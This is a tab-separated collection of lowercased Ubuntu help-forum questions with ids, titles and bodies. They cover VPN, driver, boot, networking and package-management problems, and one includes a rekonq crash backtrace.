mon feb 18 14:09:56 2013 replay-window backtrack occurred [ 1 ] mon feb 18 14:09:56 2013 data channel encrypt : cipher 'bf-cbc ' initialized with 128 bit key mon feb 18 14:09:56 2013 data channel encrypt : using 160 bit message hash 'sha1 ' for hmac authentication mon feb 18 14:09:56 2013 data channel decrypt : cipher 'bf-cbc ' initialized with 128 bit key mon feb 18 14:09:56 2013 data channel decrypt : using 160 bit message hash 'sha1 ' for hmac authentication mon feb 18 14:09:56 2013 control channel : tlsv1 , cipher tlsv1/sslv3 dhe-rsa-aes256-sha , 1024 bit rsa mon feb 18 14:09:56 2013 [ server ] peer connection initiated with [ af_inet ] xxx.xxx.xxx.xxx:8991 mon feb 18 14:09:58 2013 sent control [ server ] : 'push_request ' ( status=1 ) mon feb 18 14:09:58 2013 push : received control message : 'push_reply , route-gateway dhcp , ping 10 , ping-restart 120' mon feb 18 14:09:58 2013 options import : timers and/or timeouts modified mon feb 18 14:09:58 2013 options import : route-related options modified mon feb 18 14:09:58 2013 tun/tap device tap0 opened mon feb 18 14:09:58 2013 tun/tap tx queue length set to 100 mon feb 18 14:09:58 2013 /etc/openvpn/update-resolv-conf tap0 1500 1574 init mon feb 18 14:09:58 2013 initialization sequence completed ... but no ping to the target network works . also , listing ifconfig , there is no sign of the tap0 connection device . i have tried using gufw to add a rule to allow anything from my source server , but that made no difference . i have tried commenting out all of the script in update-resolv-conf ( thinking being that i did n't use this in windows , so maybe not needed for my connection type ? ) - but this made no difference . i 'm stumped . so far as i can tell i have configured network manager ( and my /etc/openvpn/cope.conf file ) correctly to match my server . is this a problem for 12.10 ? my server is running ovpn 2.2.1 and i do not explicitly indicate cipher type ( uses defaults ) . i 've been reading all the other posts for the last three days and nothing has given a solution ( although i 've learned a fair amount ! ) all help suggestions very much appreciated . thanks
257786	how do i stop ubuntu from asking for a password to decrypt my drive on start up ?	ubuntu keeps asking for me to decrypt my drive on start up . this is expected , because i had set up full-disk encryption . how do i stop this now ?
257787	sharing wired network	i have a wired connection over a proxy server , and i 'd like to share it over wireless to my other laptop . is there some software or something that allows me to do this ? i am using ubuntu 12.04 on the machine with wired internet connection and windows 7 on other . ( it is diffferent from previously asked question as that is for home network not behind proxy server and my question is about the network behind proxy )
257789	how add additional harddrives for backuppc ?	how do i add additional harddrives for backup using backuppc ? note : currently we have added 1 hdd of 300 gb which is going to get full . we need to add one more hdd to make backup a smooth one . how do i add additional hdd ?
257791	internet connection problem in ubuntu 12.10	my wired and wireless and datacard gets connected to the internet . but there will be no data transfer.. i have this problem when i upgraded from 12.04 to 12.10 . i cant connect to internet to download broadcom drivers.. help to get rid of this issue..
257796	ubuntu 12.04 - log-in to squiggly display with 2 hard drives connected	currently , my pc works fine with hard drive # 1 ( 320gb ) . later , i then installed another hard drive , # 2 ( 500gb ) . both hard drives have almost the exact image on them , ubuntu 12.04 . i configured the pc to boot from hard drive # 1 . it recognizes hard drive # 2 as a third master drive . when i boot , and after logging in , the workspace is displayed as `` squiggly '' ; that 's a technical term . this would look like your analog tv screen displaying an untuned signal , remember what that looks like ? i do n't see this problem when either hard drive is the only hard drive connected . i do n't see issues with my graphics card . why do they not work well together ?
257798	no usb , no wired network after installing 12.04	i formatted and installed ubuntu 12.04 on my dell e1505 . now ubuntu starts faster . but ubuntu does n't recognice usb drives , touchpad , ethernet or wifi . please help me .
257807	how to compile c11 iso standard code with g++ compiler	system details : $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.2 lts '' $ g++ -- version g++ ( ubuntu/linaro 4.6.3-1ubuntu5 ) 4.6.3 copyright ( c ) 2011 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose .
257808	how can i use init.d ( or some other method ) to run a screen script on boot up ?	i have a shell script that runs inside of a screen session and loops the script continuously every 10 minutes ( never ends ) . i was wondering how i might initiate the screen session , run the shell script , then detach from it on boot . right now i run this : screen sh /var/www/scripts/screen.sh ctrl+ad ( to detach )
257810	how do i install proprietary amd drivers for a radeon hd 6870m / integrated intel hybrid graphics ?	might already have been answered , but every single tries did not work , so i 'm asking this here . so yeah , i ca n't manage to install the amd proprietary drivers ( neither can i for open-source ones ) , i 've tried using different versions of the drivers , nothing worked . lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati broadway [ ati mobility radeon hd 6800 series ] my machine is an alienware m17x r3 laptop ( yeah i know , over expensive comp ) , and i 've set it up to dual-boot with windows 7 ( 64x ) and ubuntu 12.10 ( 32x ) . do n't ask me why i picked a different type os , i do n't know . i know that it 's kinda easy to install drivers for an amd card on ubuntu , but since mine is a radeon / intel hybrid , most of the techniques i know do n't work . can someone help me on this one ?
257815	ca n't boot into ubuntu 12.10 after installing on an uefi system	i have sony viao svs13112enb which has a insyde h2o bios with uefi and enabled . it came with windows 7 and then i upgraded it to windows 8 . now i am trying to install and run ubuntu with dual boot . i used liveusb to install ubuntu . when i reboot and boot into usb , i see this message : `` secure boot is not enabled '' for a second , then i get grub-like option to `` try without installing '' , `` install ubuntu '' , `` oem installation '' and `` disk check '' options . i carry along to install ubuntu . i created new partitions for root and swap , and used the already existing efi partition . the installation we n't normal but when it is done is when i 'm facing problem , when it reboots windows 8 boots up like nothing ever happened . i know ubuntu still have issues with uefi . was anyone able to overcome this ? am i missing anything here ? please help me , i need to install ubuntu on my laptop . thanks in advance .
257816	how do i download steam ? what additional software do i need ?	when i click download ( for steam ) i get this message : this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . i have installed java , but i do n't know what additional software it needs/ requires . when i try to install using terminal it says : the following packages have unmet dependencies : steam : i386 : depends : libgl1-mesa-dri : i386 depends : libgl1-mesa-glx : i386 e : unable to correct problems , you have held broken packages . can anybody help me ?
257817	update manager error : `` the package lists or status file could not be opened or read ''	in ubuntu 12.04 , update manager says : e : read error - read ( 5 : input / output error ) , e : the package lists or status file could not be opened or read , meaning that your installed packages have unresolved dependencies . how can i solve this problem ?
257819	local system mail and command line mail through gmail	i have a bit of an odd question that i 'm having trouble solving , i 've had a good search around , but ca n't seem to find something related online . my aim is : system mail for root is forwarded ( i guess using exim ) to /var/mail/username ( i 'm not sure how to test if i have setup exim correctly for this . ( used dpkg-reconfigure exim4-config , and set it to use local only ) . i can manually use a mail command to send email using my gmail account smtp ( i have a script that probes for my ip and sends me an email using the mail command , as my isp tends to keep it dynamic , but i need my ip for ssh purposes )
257822	how can i uninstall qt5 that i installed from .run ?	i installed qt from qt-linux-opensource-5.0.1-x86_64-offline.run file . it works fine , but i am unable to use kde libs in it . so can anyone please say how to uninstall it ? ? i could also not find any like uninstall or something in the installed directory .
257824	can not type `` ć '' on hungarian layout	i need help with keyboard layouts . my layout is hungarian and on windows i could type ć using altgr-9 + c which is a c with an acute . however altgr-9 + space gives me a single quote ( ' ) and altgr-9 + c gives me this ç a c with a cedilla despite there is an acute printed on key 9 . i tried the hungarian and hungarian ( standard ) layouts in system settings as well , but the others i can not understand ( dead keys/comma/dot ... what do these mean ? ) . i did n't notice any problems with any other characters . thanks in advance for any advice !
257825	nvidia display settings wiped on reboot ubuntu 12.10 64bit	i have the latest ( 31x beta ) nvidia drivers on ubuntu 12.10 64bit and no matter how many times i save my display configuration settings after editing my refresh rate and dual monitor position the settings revert back to default every time i reboot or log out & log in . after looking extensively into the issue i learned that nvidia by default loads different display settings based on the user logged in . i know this is true because on the login screen it displays 120hz , but the moment i log in to my account the settings are reverted . my issue is i can not for the life of me figure out how to save my display configuration on a user level instead of system wide . i have tried starting the nvidia settings pane as root to change settings but that still only saves settings system wide . any help would be much appreciated ! thanks in advance .
257828	stream and control music from ubuntu to android	i have a laptop running ubuntu 12.10 , and an android 2.3.4 ( samsung galaxy fit ) . i connect my android to a speaker far away from me . i want to stream music from my laptop using rhythmbox to my phone . i also want to change the tracks from my laptop . it should stop playing the current track on my phone and switch to the track i changed to . how can i do that ? thanks ! : d
257831	how can i resize an animated gif file using imagemagick ?	i want to resize such an animated gif file do.gif if i do convert do.gif -resize 24x24\ ! do-24.gif i get it resized in do-24.gif but not animated how to resize it right way to get the same animation ?
257835	12.10 installation has taken 7.5 hours already	i 'm trying to install ubuntu 12.10 desktop 32-bit in virtualbox 4.2.6 r82870 running under windows vista 64-bit . i 'm installing from a dvd drive . the installation went fine up to the point where it said `` checking for packages to remove '' but it has now been in that state for more than 7.5 hours , all the time thrashing the dvd drive . i ca n't believe this is normal . if i stop the installation , will i be able to complete it ?
257838	videocall in skype causes closing session on ubuntu 12.04 , x86 ?	strange problem with videocalling on skype . installation of skype passed unremarkably and normal calls working fine . but when trying to do video call turning on the camera of the partner causes closing of the session , with black screen flashing for a second displaying an error message in command line , then appearing the logon screen . after logon all programs are closed , but the opened before disk partitions are still mounted . sometimes videocall goes fine , and problem appears after 4-5 minutes . in some cases after some such `` restarts '' call can be done without interruption for more than half an hour . but the lasti time it was breaking each 5 minutes ofr 4 times in a row , so finally i have to switch to windows . what can be the reason ? maybe a problem with the camera driver , becouse crash happens only in my computer . the laptop is older one - hp probook 4510s , with built-in camera . with the previous ubuntu and skype versions never had such problems ubuntu 12.04 is a clear install after formatting the partition ( due to unsuccessful upgrade to 12.10 ) . skype was installed trough software center
257845	ubuntu 12.04/12.10 wo n't boot	i 've made 3 usb installers ; and none of them have installed ? i do n't understand what 's happening ?
257849	any idea why firefox not showing bold words ?	as you can see in this picture firefox does n't show any word that is bold : as you can see the some lines are not shown properly . for example first line of search result is : how to make_______4________3 which normally should be : how to make firefox 4 look like firefox 3 here is another picture : this is is more inconvenient , title in top of the page , menus in left side of the page , and some titles and menus in context are missing . i already remove it and install again , still not working . any idea would be appreciated . i have 12.10 installed ( if it matters ) . thanks in advance .
257851	no hard drive how can i install this tool/os ?	my system wont boot because it says there is no hard drive ( witch there is but may have just given out ) if this is so would ubuntu work to recover the data on that drive or is it a done deal ?
257852	ubuntu 12.04 - not recognizing atheros ar8161 gigabit ethernet	i built my own computer about a month ago and loaded windows 7 on it , and then decided to put ubuntu 12.04 on instead . it does n't recognize my ethernet cable , and i can not get any internet what-so-ever . i would like to know which drivers to download . i have 32-bit , if that helps . i do have an external hdd that i can transfer between computers with . thank you in advanced .
257854	is my hardware capable of running ubuntu 12.10 ?	need help about installing ubuntu 12.10 on my computer . these are my computer hardware details . intel pentium iii processor 797 mhz 384 mb of ram 10 gb hard drive space . on c-drive am having windows xp pro ( its working ok with this hardware ) . want to install ubuntu 12.10 on d-drive which is 10 gb . will it run smoothly if i install ? many thanks for your valuable time .
257859	how to upgrade to ubuntu 12.10 from 10.04 ( lucid )	currently am having two os one is ubuntu 10.04 and windows 7 . how to upgrade the ubuntu to 12.10 . kindly guide the installation without affecting windows 7 os . thanks in advance..
257861	which driver should i choose ?	i have to play 720p/1080p videos and i want to play games , so i need the best i can get . in software sources , under additional drivers , these are my options : using x.org x server -- amd/ati display driver wrapper from xserver-xorg-video-ati ( open source ) using video driver for the amd graphics accelerators from fglrx ( proprietary ) using video driver for the amd graphics accelerators from fglrx-updates ( proprietary )
257862	rekonq crashes on ubuntu 12.04 . cant display some images ?	here is the crash information . this started happenning after i tried update rekonq to 2.0 version . but now i have downgraded to 0.9 here is the guide which i have followed - http : //handytutorial.com/install-rekonq-2-0-in-ubuntu-12-10-12-04/ application : rekonq ( rekonq ) , signal : segmentation fault using host libthread_db library `` /lib/i386-linux-gnu/libthread_db.so.1 '' . [ current thread is 1 ( thread 0xb2d95980 ( lwp 15340 ) ) ] thread 9 ( thread 0xb079bb40 ( lwp 15341 ) ) : # 0 0xb7792424 in __kernel_vsyscall ( ) # 1 0xb756d5f0 in poll ( ) from /lib/i386-linux-gnu/libc.so.6 # 2 0xb39d2a7b in g_poll ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 3 0xb39c50ae in ? ? ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 4 0xb39c556b in g_main_loop_run ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 5 0xb1653134 in ? ? ( ) from /usr/lib/i386-linux-gnu/gio/modules/libdconfsettings.so # 6 0xb39e86b3 in ? ? ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 7 0xb3d42d4c in start_thread ( ) from /lib/i386-linux-gnu/libpthread.so.0 # 8 0xb757bd3e in clone ( ) from /lib/i386-linux-gnu/libc.so.6 thread 8 ( thread 0xafdffb40 ( lwp 15342 ) ) : # 0 0xb7792424 in __kernel_vsyscall ( ) # 1 0xb756d5f0 in poll ( ) from /lib/i386-linux-gnu/libc.so.6 # 2 0xb39d2a7b in g_poll ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 3 0xb39c50ae in ? ? ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 4 0xb39c556b in g_main_loop_run ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 5 0xb154f1ba in ? ? ( ) from /usr/lib/i386-linux-gnu/libgio-2.0.so.0 # 6 0xb39e86b3 in ? ? ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 7 0xb3d42d4c in start_thread ( ) from /lib/i386-linux-gnu/libpthread.so.0 # 8 0xb757bd3e in clone ( ) from /lib/i386-linux-gnu/libc.so.6 thread 7 ( thread 0xaf3ffb40 ( lwp 15343 ) ) : # 0 0xb7792424 in __kernel_vsyscall ( ) # 1 0xb3d46d13 in pthread_cond_timedwait @ @ glibc_2.3.2 ( ) from /lib/i386-linux-gnu/libpthread.so.0 # 2 0xb75896a4 in pthread_cond_timedwait ( ) from /lib/i386-linux-gnu/libc.so.6 # 3 0xb3a048e0 in g_cond_wait_until ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 4 0xb39980b9 in ? ? ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 5 0xb39988de in g_async_queue_timeout_pop ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 6 0xb39e8f7c in ? ? ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 7 0xb39e86b3 in ? ? ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 8 0xb3d42d4c in start_thread ( ) from /lib/i386-linux-gnu/libpthread.so.0 # 9 0xb757bd3e in clone ( ) from /lib/i386-linux-gnu/libc.so.6 thread 6 ( thread 0x9f534b40 ( lwp 15344 ) ) : # 0 0xb7792424 in __kernel_vsyscall ( ) # 1 0xb3d4696b in pthread_cond_wait @ @ glibc_2.3.2 ( ) from /lib/i386-linux-gnu/libpthread.so.0 # 2 0xb758964c in pthread_cond_wait ( ) from /lib/i386-linux-gnu/libc.so.6 # 3 0xb6acb263 in ? ? ( ) from /usr/lib/i386-linux-gnu/libqtwebkit.so.4 # 4 0xb6acb37f in ? ? ( ) from /usr/lib/i386-linux-gnu/libqtwebkit.so.4 # 5 0xb3d42d4c in start_thread ( ) from /lib/i386-linux-gnu/libpthread.so.0 # 6 0xb757bd3e in clone ( ) from /lib/i386-linux-gnu/libc.so.6 thread 5 ( thread 0x9ed33b40 ( lwp 15346 ) ) : # 0 0xb7792424 in __kernel_vsyscall ( ) # 1 0xb756d5f0 in poll ( ) from /lib/i386-linux-gnu/libc.so.6 # 2 0xb39d2a7b in g_poll ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 3 0xb39c50ae in ? ? ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 4 0xb39c5201 in g_main_context_iteration ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 5 0xb4018887 in qeventdispatcherglib : :processevents ( qflags < qeventloop : :processeventsflag > ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 6 0xb3fe450d in qeventloop : :processevents ( qflags < qeventloop : :processeventsflag > ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 7 0xb3fe47a9 in qeventloop : :exec ( qflags < qeventloop : :processeventsflag > ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 8 0xb3ecd94c in qthread : :exec ( ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 9 0xb3ecda3b in qthread : :run ( ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 10 0xb3ed0de0 in ? ? ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 11 0xb3d42d4c in start_thread ( ) from /lib/i386-linux-gnu/libpthread.so.0 # 12 0xb757bd3e in clone ( ) from /lib/i386-linux-gnu/libc.so.6 thread 4 ( thread 0x93e3ab40 ( lwp 15347 ) ) : # 0 0xb7792424 in __kernel_vsyscall ( ) # 1 0xb3d4696b in pthread_cond_wait @ @ glibc_2.3.2 ( ) from /lib/i386-linux-gnu/libpthread.so.0 # 2 0xb758964c in pthread_cond_wait ( ) from /lib/i386-linux-gnu/libc.so.6 # 3 0xb737c029 in ? ? ( ) from /usr/lib/i386-linux-gnu/libqtscript.so.4 # 4 0xb737c06f in ? ? ( ) from /usr/lib/i386-linux-gnu/libqtscript.so.4 # 5 0xb3d42d4c in start_thread ( ) from /lib/i386-linux-gnu/libpthread.so.0 # 6 0xb757bd3e in clone ( ) from /lib/i386-linux-gnu/libc.so.6 thread 3 ( thread 0x93639b40 ( lwp 15348 ) ) : # 0 0xb7792424 in __kernel_vsyscall ( ) # 1 0xb7574d61 in select ( ) from /lib/i386-linux-gnu/libc.so.6 # 2 0xb3fbfe26 in ? ? ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 3 0xb3ed0de0 in ? ? ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 4 0xb3d42d4c in start_thread ( ) from /lib/i386-linux-gnu/libpthread.so.0 # 5 0xb757bd3e in clone ( ) from /lib/i386-linux-gnu/libc.so.6 thread 2 ( thread 0x92cf3b40 ( lwp 15352 ) ) : # 0 0xb7792424 in __kernel_vsyscall ( ) # 1 0xb3d4696b in pthread_cond_wait @ @ glibc_2.3.2 ( ) from /lib/i386-linux-gnu/libpthread.so.0 # 2 0xb758964c in pthread_cond_wait ( ) from /lib/i386-linux-gnu/libc.so.6 # 3 0xb3ed1350 in qwaitcondition : :wait ( qmutex* , unsigned long ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 4 0xb513cacc in ? ? ( ) from /usr/lib/libthreadweaver.so.4 # 5 0xb513f95b in ? ? ( ) from /usr/lib/libthreadweaver.so.4 # 6 0xb513c63a in ? ? ( ) from /usr/lib/libthreadweaver.so.4 # 7 0xb513fa5c in ? ? ( ) from /usr/lib/libthreadweaver.so.4 # 8 0xb513c533 in ? ? ( ) from /usr/lib/libthreadweaver.so.4 # 9 0xb513e4e4 in ? ? ( ) from /usr/lib/libthreadweaver.so.4 # 10 0xb513e59a in threadweaver : :thread : :run ( ) ( ) from /usr/lib/libthreadweaver.so.4 # 11 0xb3ed0de0 in ? ? ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 12 0xb3d42d4c in start_thread ( ) from /lib/i386-linux-gnu/libpthread.so.0 # 13 0xb757bd3e in clone ( ) from /lib/i386-linux-gnu/libc.so.6 thread 1 ( thread 0xb2d95980 ( lwp 15340 ) ) : [ kcrash handler ] # 7 0xb4141dd8 in qobject : :staticmetaobject ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 8 0xb37ec4e9 in attica : :providermanager : :providermanager ( qflags < attica : :providermanager : :providerflag > const & ) ( ) from /usr/lib/libattica.so.0.4 # 9 0xb55954b2 in ? ? ( ) from /usr/lib/libkdeui.so.5 # 10 0xb559135a in kaboutapplicationdialog : :private : :init ( kaboutdata const* , qflags < kaboutapplicationdialog : :option > ) ( ) from /usr/lib/libkdeui.so.5 # 11 0xb5591fff in kaboutapplicationdialog : :kaboutapplicationdialog ( kaboutdata const* , qwidget* ) ( ) from /usr/lib/libkdeui.so.5 # 12 0xb56fa877 in khelpmenu : :aboutapplication ( ) ( ) from /usr/lib/libkdeui.so.5 # 13 0xb56fa935 in ? ? ( ) from /usr/lib/libkdeui.so.5 # 14 0xb3ffc6b1 in qmetaobject : :activate ( qobject* , qmetaobject const* , int , void** ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 15 0xb42799bd in qaction : :triggered ( bool ) ( ) from /usr/lib/i386-linux-gnu/libqtgui.so.4 # 16 0xb4279c5b in qaction : :activate ( qaction : :actionevent ) ( ) from /usr/lib/i386-linux-gnu/libqtgui.so.4 # 17 0xb4279fb8 in ? ? ( ) from /usr/lib/i386-linux-gnu/libqtgui.so.4 # 18 0xb3ff7c01 in qmetacallevent : :placemetacall ( qobject* ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 19 0xb4000c7b in qobject : :event ( qevent* ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 20 0xb4279d31 in qaction : :event ( qevent* ) ( ) from /usr/lib/i386-linux-gnu/libqtgui.so.4 # 21 0xb552e17f in kaction : :event ( qevent* ) ( ) from /usr/lib/libkdeui.so.5 # 22 0xb4280ed4 in qapplicationprivate : :notify_helper ( qobject* , qevent* ) ( ) from /usr/lib/i386-linux-gnu/libqtgui.so.4 # 23 0xb428630d in qapplication : :notify ( qobject* , qevent* ) ( ) from /usr/lib/i386-linux-gnu/libqtgui.so.4 # 24 0xb56349a1 in kapplication : :notify ( qobject* , qevent* ) ( ) from /usr/lib/libkdeui.so.5 # 25 0xb3fe597e in qcoreapplication : :notifyinternal ( qobject* , qevent* ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 26 0xb3fe9ad8 in qcoreapplicationprivate : :sendpostedevents ( qobject* , int , qthreaddata* ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 27 0xb3fe9e0c in qcoreapplication : :sendpostedevents ( qobject* , int ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 28 0xb4018494 in ? ? ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 29 0xb39c4d86 in g_main_context_dispatch ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 30 0xb39c5125 in ? ? ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 31 0xb39c5201 in g_main_context_iteration ( ) from /lib/i386-linux-gnu/libglib-2.0.so.0 # 32 0xb4018887 in qeventdispatcherglib : :processevents ( qflags < qeventloop : :processeventsflag > ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 33 0xb4339aaa in ? ? ( ) from /usr/lib/i386-linux-gnu/libqtgui.so.4 # 34 0xb3fe450d in qeventloop : :processevents ( qflags < qeventloop : :processeventsflag > ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 35 0xb3fe47a9 in qeventloop : :exec ( qflags < qeventloop : :processeventsflag > ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 36 0xb3fe9eba in qcoreapplication : :exec ( ) ( ) from /usr/lib/i386-linux-gnu/libqtcore.so.4 # 37 0xb427ea74 in qapplication : :exec ( ) ( ) from /usr/lib/i386-linux-gnu/libqtgui.so.4 # 38 0xb775be7f in kdemain ( ) from /usr/lib/kde4/libkdeinit/libkdeinit4_rekonq.so # 39 0x080484fb in ? ? ( ) # 40 0xb74a64d3 in __libc_start_main ( ) from /lib/i386-linux-gnu/libc.so.6 # 41 0x08048521 in _start ( )
257874	ubuntu ca n't see my android phone !	i 'm on ubuntu 12.04 , and trying to connect my samsung galaxy gio ( model # gt-s5660m ) with android 2.3.4 ( gingerbread_mr1 ) . when i plug my phone in , via usb , it will charge , however ubuntu will not recognize it in any other way . i tried the mtp programs in the software center however they both turned out to be of no use ( neither detected the phone ) . so my question is , how can i make it so i can , at least , transfer audio and videos to the micro sd in my phone with out removing it and using an adapter ?
257875	'hibernate ' does n't work on xubuntu 12.04	i 've just installed xubuntu on my laptop . all works fine except that hibernating does n't work . i ( successfully ) resized the swap partition with gparted but it 's still the same . when restarting the computer after hibernating the programs from last session are displayed but the computer does n't respond anymore and i have to reboot . could anyone please help me . i need the 'hibernate'-function .
257877	the ubuntu installer ca n't see the windows 8 partition during installation	i tried to install ubuntu 12.10 alongside windows 8 , but when i get to the installation type screen i do n't have any option for installing alongside windows 8 . ubuntu says i have no other operating systems and my partitions appear as free space . what can i do ?
257878	hp pavilion laptop overheating	i 'm using wubi ( 12.04.2 lts ) to dual-boot between windows 7 and ubuntu , but when i boot up ubuntu my laptop overheats and after some hours ( sometimes minutes ) it shutdowns because of the overheat . i tried installing additional drivers but when i opened it up it said that there were no drivers . is there a way to fix this ? specs : cpu - amd phenom ( tm ) ii n660 dual-core processor gpu - amd radeon hd 6470m ( w/ switchable graphics )
257881	password does n't work for wireless in ubuntu 12.10	i have installed 64-bit ubuntu 12.10 . i have intel cupertino-n 6150 wireless adapter . at university , where i have no password , i am able to connect to the wireless network seamlessly , however at home , where i have a password , i can not connect . i am sure that the password i type is correct ( i rechecked the password on the other devices which connect ) i tried different security settings , still without any luck . update after restarting the router my computer was able to connect to the network . do not repeat my mistakes - )
257882	e : unable to locate ubuntu-restricted-extras	i have tried re-installing restricted extras but still can not locate the file . now , when i run sudo apt-get install ubuntu-restricted-extras i am getting this message e : unable to locate package ubuntu-restricted-extras i 've tried using sudo killall update-manager the response is `` no process found '' . i used janitor to clean my machine yesterday , could this be the issue here as janitor might have cleaned all my packages ?
257885	how to detect that specified machine is present in local network	how can i detect - using bash if possible - that specific ( i.e . name or mac address ) machine has appeared in local network ? ip addresses are dynamically assigned , so i ca n't rely on `` traditional '' ping .
257886	get dpkg -- get-selections equivalent list from dpkg.status.0	my ssd crashed , and i ca n't find the output from dpkg -- get-selections that i created recently . however , i could make a copy of the /var/backups/dpkg.status.0 file from the broken ssd . i feel like all the information , that dpkg -- get-selections gave me is in there , but in the wron format . and i feel like , there must be a command , that allows to convert it ( rather that writing a script myself ) . question : what is that command ?
257887	how do you purge a manual install completely ?	when i install have needed to install packages manually by running ./program or make or whatever . i ( unsurprisingly ) can not purge such programs using apt-purge to get rid of them . i want to know how to do it . even if it is only a long winded process . how do i find out where an install placed all its files so i can manually delete them at least ?
257892	how to make rsync run automatically when a new file or directory is added ?	i decided to use rsync for backing up my downloaded torrents from my home-server to my laptop . i read the whole manual , but i did n't find a way to sync files automatically when a new file or directory is added to the complete torrents directory . the best thing i could find was running rsync daily by a cron-job , but i want it to be more intelligent , like ubuntu-one and do the job just when a new thing adds .
257896	what is meant by mask and effective in the output from getfacl ?	what is meant by mask and effective in the output from getfacl ? getfacl /var/www : getfacl : removing leading '/ ' from absolute path names file : var/www owner : name group : name user : :-wx user : test : rwx effective : r -- group : :rw- effective : r -- mask : :r -- other : :rwx
257897	error loading libgl.so.1	when attempting to run various pieces of software ( notably steam and yenka ) , i have come across an error similar to this : enter code here error while loading shared libraries : libgl.so.1 : can not open shared object file : no such file or directory i 'm running a 64 bit system , with an nvidia optimus card ( i dual boot for certain windows only software that requires a dedicated graphics card ) . i have bumblebee installed , and i am using the nvidia-current driver , rather that one downloaded from nvidia , as recommended . the library ( libgl.so.1 ) is not present in the top directory of /usr/lib , however it is present in /usr/lib32/nvidia-current , as a softlink to /usr/lib32/nvidia-current/libgl.so.304.64 . a section of the output from ldconfig -p : libgl.so.1 ( libc6 , x86-64 , os abi : linux 2.4.20 ) = > /usr/lib/x86_64-linux-gnu/mesa/libgl.so.1 libgl.so ( libc6 , x86-64 , os abi : linux 2.4.20 ) = > /usr/lib/x86_64-linux-gnu/libgl.so libgl.so ( libc6 , x86-64 , os abi : linux 2.4.20 ) = > /usr/lib/x86_64-linux-gnu/mesa/libgl.so obviously a library with that name is being loaded , but they are located in /usr/lib/x86_64-linux-gnu , however installed software does n't seem to able to 'see ' it . for steam , running it with optirun causes it to work , but this is not the case for yenka . i assume that optirun causes the library stored in /usr/lib32/nvidia-current to be used , which allows steam to run , so i ca n't understant why yenka wo n't run . can anyone explain why software ca n't see the normal mesa library , and why yenka refuses to run with the nvidia-current library ?
257902	is there a difference between a symbolic link via terminal or right-click make link ?	i 'm wondering if there is a difference between going to a terminal and typing ln -s path 'path or just right clicking on something and selecting make link .
257905	how can i tell which package an executable came from ?	i 'm answering a question with a suggestion to use rename , and i realize i do n't know what package it comes from ( as part of the answer , i imagine saying something like `` if you do n't have rename , it 's installed as part of [ package ] '' ) . man rename tells me to see also : mv ( 1 ) , perl ( 1 ) - so my first thought is that it was installed with perl . a related answer , how to tell what was installed as part of a package , helps me figure out that the perl package includes prename but not rename - and it turns out that my /usr/bin/rename points to /etc/alternatives/rename which points to /usr/bin/prename so this is still kind of confusing . did /etc/alternatives/rename point somewhere else before i installed perl ? is there a general way to tell which package something comes from ?
257908	how to remove the basic conky installed on ubuntu ?	i have installed basic-conky using the following commands : wget -o basic-conky-eth-u.zip http : //goo.gl/n0jlg unzip basic-conky-eth-u.zip sudo rm basic-conky-eth-u.zip now how do i remove it ? even downloaded the startup script using these commands : wget -o .start-conky http : //goo.gl/6rrew chmod +x .start-conky i do n't want to continue with it . can anyone tell how to remove it ?
